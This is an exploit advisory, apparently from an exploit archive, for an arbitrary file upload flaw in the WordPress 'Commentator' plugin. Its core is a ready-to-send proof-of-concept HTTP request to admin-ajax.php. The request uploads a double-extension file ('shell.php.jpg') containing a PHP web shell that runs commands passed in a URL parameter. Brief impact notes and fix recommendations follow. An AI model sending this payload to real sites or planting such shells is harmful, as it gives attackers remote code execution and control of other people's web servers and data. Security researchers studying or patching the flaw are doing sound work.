################################################################################ # Exploit Title: WordPress Commentator Plugin - Arbitrary File Upload # Date: 2026-02-05 # Exploit Author: Ahmad # Category: Webapps # Vulnerability Type: [CWE-434] Unrestricted Upload of File with Dangerous Type ################################################################################ [+] Description: The "Commentator" plugin for WordPress contains an arbitrary file upload vulnerability via the 'commentator_upload-image' action in admin-ajax.php. An attacker can bypass extension filters using double extensions (e.g., .php.jpg) to upload malicious scripts and achieve Remote Code Execution (RCE). [+] Proof of Concept (PoC): POST /wp-admin/admin-ajax.php HTTP/2 Host: TARGET_HOST Content-Type: multipart/form-data; boundary=---------------------------219582655323612 -----------------------------219582655323612 Content-Disposition: form-data; name="action" commentator_upload-image -----------------------------219582655323612 Content-Disposition: form-data; name="upl"; filename="shell.php.jpg" Content-Type: image/jpeg <?php system($_GET['cmd']); ?> -----------------------------219582655323612-- [+] Impact: An attacker can gain full control over the web server, access sensitive data, and modify the database by executing arbitrary commands. [+] Recommendations: - Implement strict file extension whitelisting. - Rename uploaded files automatically on the server side. - Disable script execution in the upload directory. -thnks to -IdiotCrew - L4663R666H05T ################################################################################